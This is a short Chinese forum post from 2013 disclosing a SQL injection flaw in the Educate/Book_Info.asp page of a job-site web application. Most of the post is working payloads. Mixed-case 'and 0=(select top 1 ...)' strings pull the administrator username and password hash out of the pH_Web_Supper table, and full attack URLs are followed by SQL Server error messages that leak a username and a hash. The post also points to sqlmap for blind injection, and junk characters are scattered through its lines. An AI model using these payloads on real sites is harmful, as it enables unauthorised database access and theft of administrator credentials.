漏洞出现在Educate/Book_Info.asp
" V( @. ^3 Q2 k+ S3 K7 S8 P此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
5 T& D' B5 V/ H5 Qexp:如下
; j3 {% o% I" S8 v9 }: c0 A查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)6 c2 K: T+ l0 x! c
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
9 D- [7 w9 `8 g8 {http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)0 Y+ s, y+ e$ J. q8 B; a
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
1 r" r- a0 R' {6 n) D. l将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
6 O3 g( v& E& Q @( C/Educate/Book_Info.asp,行 8! U5 G, g$ H2 B# Q7 E$ Z$ o, e
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)$ u- d& R- ]1 ?- K' q2 ^! E! H
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'2 O0 F9 c. d+ e" J2 k0 N- |% @
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
8 K B" ~. m0 }6 b' s$ A5 w# L/Educate/Book_Info.asp,行 8 |
发表于 2013-2-13 23:56:06
收藏
支持
反对